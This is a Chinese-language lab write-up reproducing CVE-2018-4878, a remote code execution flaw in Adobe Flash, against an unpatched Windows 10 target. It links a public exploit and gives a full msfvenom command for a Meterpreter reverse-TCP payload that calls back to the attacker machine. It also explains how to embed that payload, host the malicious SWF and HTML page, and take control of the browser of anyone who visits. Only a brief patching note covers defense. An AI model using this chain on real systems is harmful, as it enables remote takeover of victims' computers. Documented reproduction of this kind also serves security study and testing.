Adboe Flash远程代码执行_CVE-2018-4878漏洞复现

一、漏洞描述

该漏洞可针对windows用户发起定向攻击。攻击者可以诱导用户打开包含恶意Flash代码文件的Microsoft Office文档、网页、垃圾电子邮件等。

二、漏洞影响版本

Flash Player版本28.0.0.137以及之前的所有版本

  

三、漏洞复现环境搭建

攻击机:kali   ip:192.168.10.136

靶机:win10   ie默认集成flash,没有升级

四、漏洞复现

1.github下载exp, https://github.com/anbai-inc/CVE-2018-4878

2.修改exp

2.1修改shellcode为自己生成的反弹连接shellcode,首先先生成反弹连接shellcode

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.10.136 lport=8888 -f python >/root/shellcode.txt

  

2.2用生成的shellcode替换exp中对应的shellcode

  

2.3修改exp中生成文件保存的路径

  

3.运行python脚本,会生成两个文件, exploit.swf和index.html

4.把exploit.swf和index.html复制到/var/www/html,然后开启web服务, 此时,Kali Linux上Web服务启动,并且具备index.html这个页面。只要靶机启用flash并访问了这个页面,则可以直接被控制

5.kali 开启监听

  

6.靶机访问http://192.168.10.136/index.html

  

7.此时kali端已经获取到会话

  

五、漏洞防御

1.下载最新版本的Adobe Flash

2.安装常见杀毒软件,开启实时防护和杀毒引擎实时升级

最新文章

  1. BZOJ 3504: [Cqoi2014]危桥 [最大流]
  2. backbone入门示例
  3. apache日志轮询技术
  4. TreeMap按照value进行排序
  5. Java RMI 框架
  6. 【转】android 最新 NDK r8 在window下开发环境搭建 安装配置与使用 详细图文讲解,完整实际配置过程记录(原创)
  7. Testlink & Redmine组合拳演练
  8. 老蜗牛写采集:一个漂亮的客户端-几个C#平台下的Winform 皮肤控件
  9. spring mvc model.addAttribute页面c:forEach取不到
  10. hdu_5795_A Simple Nim(打表找规律的博弈)
  11. Linux 定时执行任务:Crontab服务及应用集锦
  12. JAVA基础—线程池
  13. day 7-21 pymysql模块
  14. 删除ELK中的数据。。
  15. 解决vscode更新后Ext Js插件无法使用问题
  16. unity 安装破解提示partern not found和tutorials学习
  17. 搭建sftp
  18. 树剖模板(洛谷P3384 【模板】树链剖分)(树链剖分,树状数组,树的dfn序)
  19. 基于Air800+Arduino+ESP8266的混合物联网开发
  20. confluence

热门文章

  1. 手把手教你启用Win10的Linux子系统(超详细)
  2. cocos2d-x 源代码分析 总文件夹
  3. [WebGL入门]十一,着色器编译器和连接器
  4. 常见的选择<数据源协议,委托协议>(IOS发展)
  5. 不使用运算符(+、-、*、/) 来进行四则运算(C#)
  6. C# NetCore使用AngleSharp爬取周公解梦数据
  7. Servlet 3.1实践
  8. WPF实现弹幕
  9. MIS的趋势必定是围绕机器取代人手,分工越来越细(小餐厅都支持微信自助点餐,结账时就打个折,相当于省了1、2个人手,SQL发明以后,程序员的工作更多了)
  10. WPF特效-鱼游动动画